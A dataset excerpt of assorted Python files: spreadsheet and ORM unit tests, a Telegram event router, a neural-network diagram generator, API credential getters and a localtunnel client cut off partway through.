content
stringlengths 0
894k
| type
stringclasses 2
values |
---|---|
import unittest
import os
import spreadsheet
from Exceptions import *
from Cell import Cell
class ReadTests(unittest.TestCase):
def setUp(self):
spreadsheet.spreadsheet = {}
def test_read_command__malformatted_arg(self):
with self.assertRaises(InputException):
spreadsheet.read_command("1")
def test_read_command__not_in_spreadsheet(self):
spreadsheet.spreadsheet = {"V7":Cell("V7")}
result = spreadsheet.read_command("B8")
self.assertEqual(result,"<empty>")
def test_read_command__success(self):
cell = Cell("B8")
cell.type = "TEXT"
cell.value = 42
spreadsheet.spreadsheet = {"V7":Cell("V7"),"B8":cell}
result = spreadsheet.read_command("B8")
self.assertEqual(result,42)
def test_read_command__success_lowercase(self):
cell = Cell("B8")
cell.type = "TEXT"
cell.value = 42
spreadsheet.spreadsheet = {"V7":Cell("V7"),"B8":cell}
result = spreadsheet.read_command("b8")
self.assertEqual(result,42)
class WriteTests(unittest.TestCase):
def setUp(self):
spreadsheet.spreadsheet = {}
def test_write_command__malformatted_args(self):
with self.assertRaises(InputException):
spreadsheet.write_command("a1")
def test_write_command__success_int(self):
result = spreadsheet.write_command("a1 1")
self.assertEqual(result, 1)
self.assertEqual(type(result), int)
def test_write_command__success_lowercase(self):
spreadsheet.write_command("a1 hi")
self.assertTrue("A1" in spreadsheet.spreadsheet)
def test_write_command__success_float(self):
result = spreadsheet.write_command("a1 1.2")
self.assertEqual(result, 1.2)
self.assertEqual(type(result), float)
def test_write_command__success_text(self):
result = spreadsheet.write_command("a1 hi")
self.assertEqual(result, "hi")
self.assertEqual(type(result), str)
def test_write_command__formula_constant_number(self):
result = spreadsheet.write_command("a1 =1")
self.assertEqual(result, 1.0)
self.assertEqual(type(result), float)
def test_write_command__formula_constant_text(self):
result = spreadsheet.write_command("a1 =\"hi\"")
self.assertEqual(result, "hi")
self.assertEqual(type(result), str)
def test_write_command__formula_reference(self):
spreadsheet.write_command("a1 =666")
result = spreadsheet.write_command("a2 =~a1")
self.assertEqual(result, 666)
def test_write_command__formula_reference_doesnt_exist(self):
with self.assertRaises(FormulaException):
spreadsheet.write_command("a2 =~a1")
def test_write_command__formula_reference_cyclic_dep(self):
try:
spreadsheet.write_command("a1 =~a2")
except FormulaException:
pass
with self.assertRaises(FormulaException):
spreadsheet.write_command("a2 =~a1")
def test_write_command__formula_func_min(self):
result = spreadsheet.write_command("a1 =MIN(1,2)")
self.assertEqual(result, 1)
def test_write_command__formula_func_max(self):
result = spreadsheet.write_command("a1 =MAX(1,2)")
self.assertEqual(result, 2)
def test_write_command__formula_func_concat(self):
result = spreadsheet.write_command("a1 =CONCAT(\"hi\",\"ho\")")
self.assertEqual(result, "hiho")
def test_write_command__formula_func_lookup(self):
spreadsheet.write_command("a1 1")
spreadsheet.write_command("a2 2")
spreadsheet.write_command("b1 10")
spreadsheet.write_command("b2 20")
result = spreadsheet.write_command("c1 =LOOKUP(\"A1:B2\",1,1)")
self.assertEqual(result, 10)
def test_write_command__formula_func_lookup_lowercase(self):
spreadsheet.write_command("a1 1")
spreadsheet.write_command("a2 2")
spreadsheet.write_command("b1 10")
spreadsheet.write_command("b2 20")
result = spreadsheet.write_command("c1 =LOOKUP(\"a1:B2\",1,1)")
self.assertEqual(result, 10)
def test_write_command__formula_func_sum(self):
spreadsheet.write_command("a1 1")
spreadsheet.write_command("a2 2")
spreadsheet.write_command("a3 10")
result = spreadsheet.write_command("a4 =SUM(\"A1:A3\")")
self.assertEqual(result, 13)
def test_write_command__formula_func_mean(self):
spreadsheet.write_command("a1 2")
spreadsheet.write_command("a2 3")
spreadsheet.write_command("a3 10")
result = spreadsheet.write_command("a4 =MEAN(\"A1:A3\")")
self.assertEqual(result, 5)
def test_write_command__formula_add(self):
result = spreadsheet.write_command("a1 =1+2")
self.assertEqual(result, 3)
def test_write_command__formula_multiply(self):
result = spreadsheet.write_command("a1 =3*5")
self.assertEqual(result, 15)
def test_write_command__formula_bracketed(self):
result = spreadsheet.write_command("a1 =(3*5)")
self.assertEqual(result, 15)
def test_write_command__formula_spaced(self):
spreadsheet.write_command("h1 9")
result = spreadsheet.write_command("a1 = 2 * ( 3 + 5 ) + MIN( 3 , 2 ) * ~H1")
self.assertEqual(result, 34)
class SaveTests(unittest.TestCase):
def setUp(self):
spreadsheet.spreadsheet = {}
def test_save_and_open(self):
filename = "file.out"
spreadsheet.write_command("a1 hi")
spreadsheet.save_sheet(filename)
spreadsheet.spreadsheet = {}
self.assertTrue("A1" not in spreadsheet.spreadsheet)
spreadsheet.open_sheet(filename)
result = spreadsheet.read_command("a1")
self.assertEqual(result, "hi")
os.remove(filename)
if __name__ == '__main__':
unittest.main()
|
python
|
# -*- coding: utf-8 -*-
"""INK system utilities module.
"""
from base64 import b64encode
import hashlib
import sys
from ink.sys.config import CONF
def verbose_print(msg: str):
"""
Verbose Printer.
Print called message if verbose mode is on.
"""
if CONF.debug.verbose and CONF.debug.verbose_level:
verbose_level = CONF.debug.verbose_level
else:
return
if verbose_level > 1:
print('> ' + msg, file=sys.stderr)
if verbose_level > 2:
print('>> ' + msg, file=sys.stderr)
def secure_hash(value: str, salt: str) -> str:
"""
Secure Hash Function
secure_hashing() is hashing arg[1] string and return hashed string.
Using hash function is BLAKE2B and digest size is 32.
"""
salt = salt.encode('utf-8')
# https://github.com/PyCQA/pylint/issues/2478
# https://github.com/PyCQA/pylint/issues/2551
hashobj = hashlib.blake2b(key=salt, digest_size=32) # pylint: disable=E1123
hashobj.update(value.encode('utf-8'))
return b64encode(hashobj.digest()).decode()
|
python
|
import discord
import asyncio
import MyClient
from threading import Thread
print("Discord.py Voice Recorder POC")
DISCORD_TOKEN = ""
client = MyClient.MyClient()
client.run(DISCORD_TOKEN)
|
python
|
import asyncio
import copy
import functools
from contextlib import contextmanager
from typing import (
TYPE_CHECKING,
Any,
Callable,
Dict,
Generator,
List,
Optional,
Reversible,
Tuple,
Type,
TypeVar,
Union,
)
from telethon.client.updates import EventBuilderDict
from telethon.events import common
import _garnet.patched_events as pe
from _garnet.events.action import AfterFilterAction, NoAction, ensure_action
from _garnet.events.filter import Filter, ensure_filter
from _garnet.events.handler import (
AsyncFunctionHandler,
EventHandler,
ensure_handler,
)
from _garnet.events.user_cage import KeyMakerFn, UserCage
from _garnet.loggers import events
from _garnet.vars import fsm as fsm_ctx
from _garnet.vars import handler as h_ctx
from _garnet.vars import user_and_chat as uc_ctx
if TYPE_CHECKING:
from _garnet.client import TelegramClient
from _garnet.storages.base import BaseStorage
from _garnet.storages.typedef import StorageDataT
ET = TypeVar("ET", bound=common.EventBuilder)
UnwrappedIntermediateT = Callable[[Type[EventHandler], common.EventCommon], Any]
__ProxyT = TypeVar("__ProxyT")
_EventHandlerGT = Union[
Type[EventHandler[__ProxyT]], AsyncFunctionHandler[__ProxyT],
]
FilterWithAction = Tuple[Filter[ET], Type[AfterFilterAction[ET]]]
async def check_filter(
built: EventBuilderDict,
filter_: Tuple[
Filter[Optional[ET]], Type[AfterFilterAction[Optional[ET], Any]],
],
/,
) -> bool:
f, on_err_action = filter_
if event := built[f.event_builder]:
event_token = event.set_current(event)
try:
if await f.call(event) is True:
return True
else:
asyncio.create_task(on_err_action(event, f).call())
return False
finally:
event.reset_current(event_token)
else:
events.debug(
f"Got event-naive filter: {filter_!r}, "
f"calling it with default `None`"
)
if await f.call(None) is not True:
asyncio.create_task(on_err_action(event, f).call())
return False
return True
def _map_filters(
for_event: Optional[Type[ET]],
filters: Tuple[Union[Filter[Optional[ET]], FilterWithAction[Optional[ET]]]],
) -> Generator[FilterWithAction, None, None]:
for f in filters:
if isinstance(f, tuple):
filter_, action = f
else:
filter_, action = f, NoAction
yield (
ensure_filter(for_event, filter_),
ensure_action(action, for_event),
)
class Router:
"""Router table."""
__slots__ = (
"event",
"_handlers",
"upper_filters",
"_intermediates",
"children",
"_cage_key_maker_f",
)
def __init__(
self,
default_event: Optional[ET] = None,
*upper_filters: Union[
Filter[Optional[ET]], FilterWithAction[Optional[ET]]
],
cage_key_maker: Optional[KeyMakerFn] = None,
):
"""
:param default_event: Default event
:param upper_filters: Filters to be used to test event
when event reaches this router
"""
self.event = default_event
self._handlers: List[Type[EventHandler[ET]]] = []
if default_event is not None:
self.upper_filters = _map_filters(default_event, upper_filters)
else:
self.upper_filters = upper_filters
self._intermediates: List[UnwrappedIntermediateT] = []
self.children: "List[Router]" = []
self._cage_key_maker_f = cage_key_maker
def __deepcopy__(self, memo: Dict[Any, Any]) -> "Router":
copied = self.__class__(
self.event,
*self.upper_filters,
cage_key_maker=self._cage_key_maker_f,
)
copied._handlers = self._handlers
copied._intermediates = self._intermediates
copied.children = [
copy.deepcopy(child, memo=memo) for child in self.children
]
return copied
def add_use(self, intermediate: UnwrappedIntermediateT) -> None:
"""
Add async generator function to intermediates.
:param intermediate: asynchronous generator function
"""
self._intermediates.append(intermediate)
def use(self) -> Callable[[UnwrappedIntermediateT], UnwrappedIntermediateT]:
"""
Use `.use(...)` for adding router check layer
Example:
>>> from garnet.events import Router
>>> router = Router()
>>>
>>> @router.use()
... async def router_intermediate(handler, event):
... try:
... await handler(event)
... finally:
... print("another iteration, another update")
"""
def decorator(func: UnwrappedIntermediateT) -> UnwrappedIntermediateT:
self.add_use(func)
return func
return decorator
def include(self, router: "Router", /) -> "Router":
"""Include router in `Self` and return `Self`"""
if self is router:
raise ValueError(f"Router({router!r}) cannot include it to itself.")
if router in self.children:
raise ValueError(
f"Router({router!r}) is already included for {self!r}."
)
self.children.append(router)
return self
@property
def handlers(self) -> Generator[Type[EventHandler[ET]], None, None]:
"""Deep traverse of inner handlers."""
for handler in self._handlers:
yield handler
for child in self.children:
yield from child.handlers
@property
def intermediates(self) -> Generator[UnwrappedIntermediateT, None, None]:
"""Deep traverse of inner intermediates."""
for handler in self._intermediates:
yield handler
for child in self.children:
yield from child.intermediates
@classmethod
def _wrap_intermediates(
cls,
intermediates: Reversible[UnwrappedIntermediateT],
handler: Type[EventHandler[ET]],
) -> Callable[[ET], Any]:
@functools.wraps(handler)
def mpa(event: ET) -> Any:
return handler(event)
for inter in reversed(intermediates):
mpa = functools.partial(inter, mpa)
return mpa
async def _notify_filters(self, built: EventBuilderDict) -> bool:
"""Shallow call"""
for filter_ in self.upper_filters:
if not await check_filter(built, filter_):
return False
return True
@contextmanager
def _contexvars_context(
self,
storage: "BaseStorage[StorageDataT]",
event: ET,
client: "TelegramClient",
/,
):
with uc_ctx.current_user_and_chat_ctx_manager(event):
fsm_context = UserCage(
storage,
uc_ctx.ChatIDCtx.get(),
uc_ctx.UserIDCtx.get(),
self._cage_key_maker_f,
)
event_token = event.set_current(event)
fsm_token = fsm_ctx.CageCtx.set(fsm_context)
client_token = client.set_current(client)
try:
yield
finally:
event.reset_current(event_token)
fsm_ctx.CageCtx.reset(fsm_token)
client.reset_current(client_token)
async def _notify_handlers(
self,
built: EventBuilderDict,
storage: "BaseStorage[StorageDataT]",
client: "TelegramClient",
/,
) -> bool:
"""Shallow call."""
for handler in self._handlers:
if event := built[handler.__event_builder__]:
with self._contexvars_context(
storage, event, client,
):
events.debug(
"Current context configuration: {"
f"CHAT_ID={uc_ctx.ChatIDCtx.get()},"
f"USER_ID={uc_ctx.UserIDCtx.get()},"
"}"
)
handler_token = None
try:
handler_token = h_ctx.HandlerCtx.set(handler)
for hf in handler.filters:
assert isinstance(hf, tuple), (
"Got unchecked " "handler, " "won't execute. "
)
if await check_filter(built, hf):
continue
break
else:
await self._wrap_intermediates(
self._intermediates, handler,
)(event)
return True
except pe.StopPropagation:
events.debug(
f"Stopping propagation for all next handlers "
f"after {handler!r}"
)
break
except pe.SkipHandler:
events.debug(f"Skipping handler({handler!r}) execution")
continue
finally:
if handler_token:
h_ctx.HandlerCtx.reset(handler_token)
return False
async def notify(
self,
storage: "BaseStorage[StorageDataT]",
built: EventBuilderDict,
client: "TelegramClient",
/,
) -> None:
"""Notify router and its children about update."""
if await self._notify_filters(built) and await self._notify_handlers(
built, storage, client
):
return
for router in self.children:
return await router.notify(storage, built, client)
# noinspection PyTypeChecker
def message(
self, *filters: "Filter[ET]",
) -> Callable[[_EventHandlerGT[ET]], _EventHandlerGT[ET]]:
"""Decorator for `garnet.events.NewMessage` event handlers."""
def decorator(f_or_class: _EventHandlerGT[ET]) -> _EventHandlerGT[ET]:
f_or_class_to_reg = ensure_handler(f_or_class, pe.NewMessage)
self.register(f_or_class_to_reg, filters, event=pe.NewMessage)
return f_or_class
return decorator
# noinspection PyTypeChecker
def callback_query(
self, *filters: "Filter[ET]",
) -> Callable[[_EventHandlerGT[ET]], _EventHandlerGT[ET]]:
"""Decorator for `garnet.events.CallbackQuery` event handlers."""
def decorator(f_or_class: _EventHandlerGT[ET]) -> _EventHandlerGT[ET]:
f_or_class_to_reg = ensure_handler(f_or_class, pe.CallbackQuery)
self.register(f_or_class_to_reg, filters, event=pe.CallbackQuery)
return f_or_class
return decorator
# noinspection PyTypeChecker
def chat_action(
self, *filters: "Union[Filter[ET], FilterWithAction[ET]]",
) -> Callable[[_EventHandlerGT[ET]], _EventHandlerGT[ET]]:
"""Decorator for `garnet.events.ChatAction` event handlers."""
def decorator(f_or_class: _EventHandlerGT[ET]) -> _EventHandlerGT[ET]:
f_or_class_to_reg = ensure_handler(f_or_class, pe.ChatAction)
self.register(f_or_class_to_reg, filters, event=pe.ChatAction)
return f_or_class
return decorator
# noinspection PyTypeChecker
def message_edited(
self, *filters: "Union[Filter[ET], FilterWithAction[ET]]",
) -> Callable[[_EventHandlerGT[ET]], _EventHandlerGT[ET]]:
"""Decorator for `garnet.events.MessageEdited` event handlers."""
def decorator(f_or_class: _EventHandlerGT[ET]) -> _EventHandlerGT[ET]:
f_or_class_to_reg = ensure_handler(f_or_class, pe.MessageEdited)
self.register(f_or_class_to_reg, filters, event=pe.MessageEdited)
return f_or_class
return decorator
def default(
self, *filters: "Union[Filter[ET], FilterWithAction[ET]]",
) -> Callable[[_EventHandlerGT[ET]], _EventHandlerGT[ET]]:
"""Decorator for router's default event event handlers."""
if self.event is None or (
isinstance(self.event, type)
and issubclass(self.event, common.EventBuilder)
):
raise ValueError(
"In order to use default event_builder declare it in "
"Router(...). "
f"Expected type {common.EventBuilder} got {type(self.event)!s}"
)
def decorator(f_or_class: _EventHandlerGT[ET]) -> _EventHandlerGT[ET]:
assert self.event is not None
f_or_class_to_reg = ensure_handler(f_or_class, self.event)
self.register(f_or_class_to_reg, filters, event=self.event)
return f_or_class
return decorator
def on(
self,
event_builder: "Type[common.EventBuilder]",
/,
*filters: "Union[Filter[ET], FilterWithAction[ET]]",
) -> Callable[[_EventHandlerGT[ET]], _EventHandlerGT[ET]]:
"""Decorator for a specific event-aware event handlers."""
def decorator(f_or_class: _EventHandlerGT[ET]) -> _EventHandlerGT[ET]:
f_or_class_to_reg = ensure_handler(f_or_class, event_builder)
self.register(f_or_class_to_reg, filters, event=event_builder)
return f_or_class
return decorator
def register(
self,
handler: "Type[EventHandler[ET]]",
filters: "Tuple[Union[Filter[ET], FilterWithAction[ET]], ...]",
event: "Type[common.EventBuilder]",
) -> "Router":
"""
Entrypoint for registering event handlers on particular event builders.
"""
handler = ensure_handler(handler, event_builder=event)
if handler.filters:
handler.filters += tuple(_map_filters(event, filters))
else:
handler.filters = tuple(_map_filters(event, filters))
self._handlers.append(handler)
return self
def __str__(self) -> str:
return (
f"{self.__class__.__name__} stats("
f"children={len(self.children)}, "
f"own_handlers={len(self._handlers)}, "
f"own_filters={len(self.upper_filters)}, "
f"own_intermediates={len(self._intermediates)}"
f") at {hex(id(self))}"
)
__repr__ = __str__
|
python
|
# -*- coding: utf-8 -*-
""" Manifest Decorator Tests
"""
from django.urls import reverse
from tests.base import ManifestTestCase
class DecoratorTests(ManifestTestCase):
"""Tests for :mod:`decorators <manifest.decorators>`.
"""
def test_secure_required(self):
"""Should redirect to secured version of page
if ``MANIFEST_USE_HTTPS`` setting is ``True``.
"""
# Set true
with self.defaults(MANIFEST_USE_HTTPS=True):
response = self.client.get(reverse("auth_login"))
# Test for the permanent redirect
self.assertEqual(response.status_code, 301)
# Test if the redirected url contains 'https'. Couldn't use
# ``assertRedirects`` here because the redirected to page is
# non-existant.
self.assertTrue("https" in response.get("Location"))
|
python
|
# Operadores aritmeticos
22 + 22 # Suma
22 - 2 # Resta
22 / 2 # Divison
22 // 2 # Divison entera
22 * 2 # Multiplicacion
22 % 2 # Modulo
22 ** 2 # Exponente
# Operadores de asignacion
numero = 0
numero += 2
numero -= 1
numero *= 9
numero /= 3
# Operadores de comparacion
numero1 = 5
numero2 = 3
print(numero1 == numero2)
print(numero1 != numero2)
print(numero1 > numero2)
print(numero1 < numero2)
print(numero1 >= numero2)
print(numero1 <= numero2)
|
python
|
from sqlalchemy import *
import testbase
class SingleInheritanceTest(testbase.AssertMixin):
def setUpAll(self):
metadata = BoundMetaData(testbase.db)
global employees_table
employees_table = Table('employees', metadata,
Column('employee_id', Integer, primary_key=True),
Column('name', String(50)),
Column('manager_data', String(50)),
Column('engineer_info', String(50)),
Column('type', String(20))
)
employees_table.create()
def tearDownAll(self):
employees_table.drop()
def testbasic(self):
class Employee(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return self.__class__.__name__ + " " + self.name
class Manager(Employee):
def __init__(self, name, manager_data):
self.name = name
self.manager_data = manager_data
def __repr__(self):
return self.__class__.__name__ + " " + self.name + " " + self.manager_data
class Engineer(Employee):
def __init__(self, name, engineer_info):
self.name = name
self.engineer_info = engineer_info
def __repr__(self):
return self.__class__.__name__ + " " + self.name + " " + self.engineer_info
class JuniorEngineer(Engineer):
pass
employee_mapper = mapper(Employee, employees_table, polymorphic_on=employees_table.c.type)
manager_mapper = mapper(Manager, inherits=employee_mapper, polymorphic_identity='manager')
engineer_mapper = mapper(Engineer, inherits=employee_mapper, polymorphic_identity='engineer')
junior_engineer = mapper(JuniorEngineer, inherits=engineer_mapper, polymorphic_identity='juniorengineer')
session = create_session()
m1 = Manager('Tom', 'knows how to manage things')
e1 = Engineer('Kurt', 'knows how to hack')
e2 = JuniorEngineer('Ed', 'oh that ed')
session.save(m1)
session.save(e1)
session.save(e2)
session.flush()
assert session.query(Employee).select() == [m1, e1, e2]
assert session.query(Engineer).select() == [e1, e2]
assert session.query(Manager).select() == [m1]
assert session.query(JuniorEngineer).select() == [e2]
if __name__ == '__main__':
testbase.main()
|
python
|
import pytest
from hypothesis import given
from tests.strategies import med_ints, small_floats
from tinytorch import module
class ModuleA1(module.Module):
def __init__(self):
super().__init__()
self.p1 = module.Parameter(5)
self.non_param = 10
self.a = ModuleA2()
self.b = ModuleA3()
class ModuleA2(module.Module):
def __init__(self):
super().__init__()
self.p2 = module.Parameter(10)
class ModuleA3(module.Module):
def __init__(self):
super().__init__()
self.c = ModuleA4()
class ModuleA4(module.Module):
def __init__(self):
super().__init__()
self.p3 = module.Parameter(15)
def test_stacked_demo():
"Check that each of the properties match"
mod = ModuleA1()
np = dict(mod.named_parameters())
x = str(mod)
print(x)
assert mod.p1.value == 5
assert mod.non_param == 10
assert np["p1"].value == 5
assert np["a.p2"].value == 10
assert np["b.c.p3"].value == 15
# ## Advanced Tests
# These tests generate a stack of modules of varying sizes to check
# properties.
VAL_A = 50
VAL_B = 100
class Module1(module.Module):
def __init__(self, size_a, size_b, val):
super().__init__()
self.module_a = Module2(size_a)
self.module_b = Module2(size_b)
self.parameter_a = module.Parameter(val)
class Module2(module.Module):
def __init__(self, extra=0):
super().__init__()
self.parameter_a = module.Parameter(VAL_A)
self.parameter_b = module.Parameter(VAL_B)
self.non_parameter = 10
self.module_c = Module3()
for i in range(extra):
self.add_parameter(f"extra_parameter_{i}", None)
class Module3(module.Module):
def __init__(self):
super().__init__()
self.parameter_a = module.Parameter(VAL_A)
@given(med_ints, med_ints)
def test_module(size_a, size_b):
"Check the properties of a single module"
module = Module2()
module.eval()
assert not module.training
module.train()
assert module.training
assert len(module.parameters()) == 3
module = Module2(size_b)
assert len(module.parameters()) == size_b + 3
module = Module2(size_a)
named_parameters = dict(module.named_parameters())
assert named_parameters["parameter_a"].value == VAL_A
assert named_parameters["parameter_b"].value == VAL_B
assert named_parameters["extra_parameter_0"].value is None
@given(med_ints, med_ints, small_floats)
def test_stacked_module(size_a, size_b, val):
"Check the properties of a stacked module"
module = Module1(size_a, size_b, val)
module.eval()
assert not module.training
assert not module.module_a.training
assert not module.module_b.training
module.train()
assert module.training
assert module.module_a.training
assert module.module_b.training
assert len(module.parameters()) == 1 + (size_a + 3) + (size_b + 3)
named_parameters = dict(module.named_parameters())
assert named_parameters["parameter_a"].value == val
assert named_parameters["module_a.parameter_a"].value == VAL_A
assert named_parameters["module_a.parameter_b"].value == VAL_B
assert named_parameters["module_b.parameter_a"].value == VAL_A
assert named_parameters["module_b.parameter_b"].value == VAL_B
# ## Misc Tests
# Check that the module runs forward correctly.
class ModuleRun(module.Module):
def forward(self):
return 10
@pytest.mark.xfail
def test_module_fail_forward():
mod = module.Module()
mod()
def test_module_forward():
mod = ModuleRun()
assert mod.forward() == 10
# Calling directly should call forward
assert mod() == 10
# Internal check for the system.
class MockParam:
def __init__(self):
self.x = False
def requires_grad_(self, x):
self.x = x
def test_parameter():
t = MockParam()
q = module.Parameter(t)
print(q)
assert t.x
t2 = MockParam()
q.update(t2)
assert t2.x
|
python
|
import sys
sys.path.append('../')
from pycore.tikzeng import *
import math
network = []
f = open("./arch_yolov3.txt", "r")
for x in f:
layer = {}
input_1 = x.split()
layer["id"] = input_1[0]
layer["type"] = input_1[1]
if("->" in x):
input_2 = x.split("->")[1].split()
layer["height"] = float(input_2[0])
layer["depth"] = float(input_2[2])
#handle filter size of 1024 where no space is present after x
if( not input_2[3].isalpha()):
layer["width"]= float(input_2[3][1:])
else:
layer["width"]= float(input_2[4])
if("res" in x):
layer["from"] = str(int(input_1[2])-1)
if("route" in x):
layer["c1"] = input_1[2]
try:
layer["c2"] = input_1[3]
except:
layer["c2"]=None
network.append(layer)
WIDTH_SCALE=100
HEIGHT_SCALE=10
arch2 = [
to_head( '..' ),
to_cor(),
to_begin()]
to_east="(0,0,0)"
yolos = []
for i, layer in enumerate(network):
c = []
l = None
if (layer["type"] == "conv" ):
if(network[i-1]["type"]!="conv" ): # and network[i+1]["type"]=="conv"
l = to_Conv(layer["id"],"",str(int(layer["width"])), offset="(1,0,0)", to=to_east, height=layer["height"]/HEIGHT_SCALE,depth=layer["depth"]/HEIGHT_SCALE, width=layer["width"]/WIDTH_SCALE)
if(i - 1 > 0):
if(to != None): c.append(to_connection(to,layer["id"]))
elif(network[i+1]["type"]!="conv"):
l = to_Conv(layer["id"],str(int(layer["height"])),str(int(layer["width"])), offset="(0,0,0)", to=to_east, height=layer["height"]/HEIGHT_SCALE,depth=layer["depth"]/HEIGHT_SCALE, width=layer["width"]/WIDTH_SCALE)
else:
l = to_Conv(layer["id"],"",str(int(layer["width"])), offset="(0,0,0)", to=to_east, height=layer["height"]/HEIGHT_SCALE,depth=layer["depth"]/HEIGHT_SCALE, width=layer["width"]/WIDTH_SCALE)
if ( layer["type"] == "upsample"):
#if(network[i-1]["type"]!="conv" ): # and network[i+1]["type"]=="conv"
l = to_UnPool(layer["id"], offset="(1,0,0)", to=to_east, height=layer["height"]/HEIGHT_SCALE,depth=layer["depth"]/HEIGHT_SCALE, width=layer["width"]/WIDTH_SCALE)
if(i - 1 > 0):
if(to != None):
c.append(to_connection(to,layer["id"]))
c.append(to_Upscale(layer["id"], to))
if (layer["type"] == "max"):
l = to_Pool(layer["id"], offset="(0,0,0)", to=to_east, height=layer["height"]/HEIGHT_SCALE,depth=layer["depth"]/HEIGHT_SCALE, width=0.1)
if(layer["type"] == "res"):
l = to_ResAdd(layer["id"], to)
if(to != None): c.append(to_connection(to,layer["id"]))
if(network[int(layer["from"])]["type"]=="res"):
fromheight = network[int(layer["from"])-1]["height"]/(HEIGHT_SCALE*2)+ int(layer["id"][-1])
if(to != None): c.append(to_skip_ball(str(int(layer["from"])-1), layer["id"], fromheight))
else:
fromheight = network[int(layer["from"])]["height"]/(HEIGHT_SCALE*2)+ int(layer["id"][-1])
if(to != None): c.append(to_skip_ball(layer["from"], layer["id"], fromheight))
if(layer["type"]=="yolo"):
prev_layer = network[int(layer["id"])-1]
new_x = str(2)#len(network)-int(layer["id"])
new_y = str(10-int(layer["id"][-1]))
offset = "("+new_x+",-"+new_y+",0)"
yolo = to_SoftMax(layer["id"], str(int(prev_layer["height"])), to = "("+network[-2]["id"]+"-east)", offset=offset,height=prev_layer["height"]/HEIGHT_SCALE,depth=prev_layer["depth"]/HEIGHT_SCALE, width=float(42)/WIDTH_SCALE)
yolos.append(to_connection_yolo(to,layer["id"]))
yolos.append(yolo)
to=None
if(layer["type"] == "route"):
fromheight = 5 #network[int(layer["id"])-1]["height"]/(HEIGHT_SCALE*2)
l = to_ResConcat(layer["id"], to_east)
c.append(to_skip_ball(layer["c1"],layer["id"],fromheight))
if(layer["c2"] is not None):
id = layer["c2"]
if (network[int(id)]["type"]=="res"): id = str(int(id)-1)
c.append(to_skip_ball(id,layer["id"],fromheight + int(layer["id"][:1])))
if(l is not None):
to = layer["id"]
to_east = "("+to+"-east)"
arch2.append(l)
if c is not None:
for e in c:
arch2.append(e)
yolos.reverse()
for e in yolos:
arch2.append(e)
#c = to_connection(network[i-1]["id"],layer["id"]),
#arch2.append(c)
arch2.append(to_end())
# defined your arch
arch = [
to_head( '..' ),
to_cor(),
to_begin(),
to_Conv("conv1", 512, 64, offset="(0,0,0)", to="(0,0,0)", height=64, depth=64, width=2 ),
to_Pool("pool1", offset="(0,0,0)", to="(conv1-east)"),
to_Conv("conv2", 128, 64, offset="(1,0,0)", to="(pool1-east)", height=32, depth=32, width=2 ),
to_connection( "pool1", "conv2"),
to_Pool("pool2", offset="(0,0,0)", to="(conv2-east)", height=28, depth=28, width=1),
to_SoftMax("soft1", 10 ,"(3,0,0)", "(pool1-east)", caption="SOFT" ),
to_connection("pool2", "soft1"),
to_end()
]
def main():
namefile = str(sys.argv[0]).split('.')[0]
to_generate(arch2, namefile + '.tex' )
pass
if __name__ == '__main__':
main()
|
python
|
import os
from mkmapi.exceptions import MissingEnvVar
def _get_env_var(key):
try:
return os.environ[key]
except KeyError:
raise MissingEnvVar(key)
def get_mkm_app_token():
return _get_env_var('MKM_APP_TOKEN')
def get_mkm_app_secret():
return _get_env_var('MKM_APP_SECRET')
def get_mkm_access_token():
return _get_env_var('MKM_ACCESS_TOKEN')
def get_mkm_access_token_secret():
return _get_env_var('MKM_ACCESS_TOKEN_SECRET')
def get_mkm_base_url(sandbox=False):
if sandbox:
return 'https://sandbox.cardmarket.com/ws/v2.0/output.json'
else:
return 'https://api.cardmarket.com/ws/v2.0/output.json'
|
python
|
import argparse
import uuid
import sys
import socket
import eventlet
import eventlet.event
import eventlet.greenpool
from localtunnel import util
from localtunnel import protocol
from localtunnel import __version__
def open_proxy_backend(backend, target, name, client, use_ssl=False, ssl_opts=None):
proxy = eventlet.connect(backend)
if use_ssl:
ssl_opts = ssl_opts or {}
proxy = eventlet.wrap_ssl(proxy, server_side=False, **ssl_opts)
proxy.sendall(protocol.version)
protocol.send_message(proxy,
protocol.proxy_request(
name=name,
client=client,
))
reply = protocol.recv_message(proxy)
if reply and 'proxy' in reply:
try:
local = eventlet.connect(target)
util.join_sockets(proxy, local)
except IOError:
proxy.close()
elif reply and 'error' in reply:
print " ERROR: {0}".format(reply['error'])
return
else:
pass
def start_client(**kwargs):
host = kwargs['host']
backend_port = kwargs.get('backend_port')
use_ssl = kwargs.get('use_ssl', False)
ssl_opts = kwargs.get('ssl_opts', {})
if not backend_port:
try:
backend_port = util.discover_backend_port(host)
except:
print " ERROR: Unable to connect to service."
sys.exit(0)
frontend_ip = socket.gethostbyname(host.split(':')[0])
frontend_address, frontend_hostname = util.parse_address(host,
default_ip=frontend_ip)
backend = (frontend_address[0], backend_port)
name = kwargs['name']
client = util.client_name()
target = util.parse_address(kwargs['target'])[0]
try:
control = eventlet.connect(backend)
if use_ssl:
control = eventlet.wrap_ssl(control, server_side=False, **ssl_opts)
control.sendall(protocol.version)
protocol.send_message(control,
protocol.control_request(
name=name,
client=client,
))
reply = protocol.recv_message(control)
if reply and 'control' in reply:
reply = reply['control']
def maintain_proxy_backend_pool():
pool = eventlet.greenpool.GreenPool(reply['concurrency'])
while True:
pool.spawn_n(open_proxy_backend,
backend, target, name, client, use_ssl, ssl_opts)
proxying = eventlet.spawn(maintain_proxy_backend_pool)
print " {0}".format(reply['banner'])
print " Port {0} is now accessible from http://{1} ...\n".format(
target[1], reply['host'])
try:
while True:
message = protocol.recv_message(control)
assert message == protocol.control_ping()
protocol.send_message(control, protocol.control_pong())
except (IOError, AssertionError):
proxying.kill()
elif reply and 'error' in reply:
print " ERROR: {0}".format(reply['message'])
else:
print " ERROR: Unexpected server reply."
print " Make sure you have the latest version of the client."
except KeyboardInterrupt:
pass
def run():
parser = argparse.ArgumentParser(
description='Open a public HTTP tunnel to a local server')
parser.add_argument('-s', dest='host', metavar='address',
default='v2.localtunnel.com',
help='localtunnel server address (default: v2.localtunnel.com)')
parser.add_argument('--version', action='store_true',
help='show version information for client and server')
parser.add_argument('-m', action='store_true',
help='show server metrics and exit')
if '--version' in sys.argv:
args = parser.parse_args()
print "client: {}".format(__version__)
try:
server_version = util.lookup_server_version(args.host)
except:
server_version = '??'
print "server: {} ({})".format(server_version, args.host)
sys.exit(0)
elif '-m' in sys.argv:
args = parser.parse_args()
util.print_server_metrics(args.host)
sys.exit(0)
parser.add_argument('-n', dest='name', metavar='name',
default=str(uuid.uuid4()).split('-')[-1],
help='name of the tunnel (default: randomly generate)')
parser.add_argument('-c', dest='concurrency', type=int,
